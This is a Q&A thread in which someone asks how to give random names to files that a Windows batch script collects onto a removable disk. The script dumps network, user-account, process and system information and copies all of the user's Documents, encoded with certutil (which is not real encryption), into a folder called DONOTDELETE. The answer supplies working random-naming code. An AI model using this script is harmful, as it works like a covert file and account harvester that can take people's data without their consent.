# Batch Renaming Files-

Tags: batch-file

I am trying to make a program that will gather some documents and data, rename them, encrypt them and store them on a removable disk. While I have found a way to gather the documents, and encrypt them, I have yet to determine how to rename all the documents. Preferably the name of the documents would be a randomly generated string.

My current code is as followed:

```
@echo off
color a
ipconfig > D:\DONOTDELETE\DONOTDELETE\ip.txt
net user > D:\DONOTDELETE\DONOTDELETE\users.txt
tasklist > D:\DONOTDELETE\DONOTDELETE\tasks.txt
systeminfo > D:\DONOTDELETE\DONOTDELETE\info.txt
driverquery > D:\DONOTDELETE\DONOTDELETE\drivers.txt
timeout 1
for %%F in ("%userprofile%\Documents\*") do certutil -encode "%%F"  "D:\DONOTDELETE\DONOTDELETE\%%~nxF"
```

I am hoping to have the files copied from the Documents folder to be renamed such that they are a random string.

I'm trying to rename the files to a random string. My primary issue is I am an awful programmer, after about an hour of googling and searching through stack overflows, I was unable to find a solution to my problem.

Using the code suggested, I receive the following error.

ERROR REPORT-

DecodeFile returned The data is invalid. 0x8007000d

CertUtil -encode Command Failed: 0x8007000d

CertUtil The data is invalid.

Comment: Is your question about what command is used to rename files, or do you want to know how to generate a random string?

Comment: You've listed the requirements, posted some code (both of those things good), and yet you've failed to explain the problem (how the code you posted isn't working as expected, or something it doesn't do that it needs to) and you've not asked a question What **specific problem** are you having with the code you posted, and what **specific question** can we answer for you?

Answer (score 0):

I think this would be what you're trying to do:

```
@echo off
setlocal EnableDelayedExpansion
color a
ipconfig > D:\DONOTDELETE\DONOTDELETE\ip.txt
net user > D:\DONOTDELETE\DONOTDELETE\users.txt
tasklist > D:\DONOTDELETE\DONOTDELETE\tasks.txt
systeminfo > D:\DONOTDELETE\DONOTDELETE\info.txt
driverquery > D:\DONOTDELETE\DONOTDELETE\drivers.txt
timeout 1
for %%F in ("%userprofile%\Documents\*") do (
call :randomString newfilename 20
certutil -encode "%%F"  "D:\DONOTDELETE\DONOTDELETE\!newfilename!%%~xF"
)
goto :eof

:randomString
set length=%2
set CHARS=abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
echo %CHARS%>x&for %%? in (x) do set /a strlength=%%~z? - 2&del x
for /L %%a in (1 1 %length%) do (
set /a randnr=!random!%%!strlength!
for /l %%n in (!randnr! 1 !randnr!) do set "line=!line!!CHARS:~%%n,1!"
)
set %1=%line%
goto :eof
```

Comment: For some reason the above code omits some documents from the document folder. After launching the program 6-7 times it always omitted 30-80% of the documents.

Comment: put an `echo %%~nxF` inside the `for %%F in ("%userprofile%\Documents\*") do` loop an see if it outputs all filenames.

Comment: Also, please note that you shouldn't edit an answer to show your error, but instead should tell about it in the comments, or in your question

Comment: Upon executing the code with suggested changes, my PC crashed and the disk became corrupted.

Comment: I have no idea how something like that can happen. Echo should only output the names of the files to the cmd window

Comment: I'm guessing you made an error in your loop causing it to encrypt stuff like in the sys32 folder, but I have no idea how something like that can happen.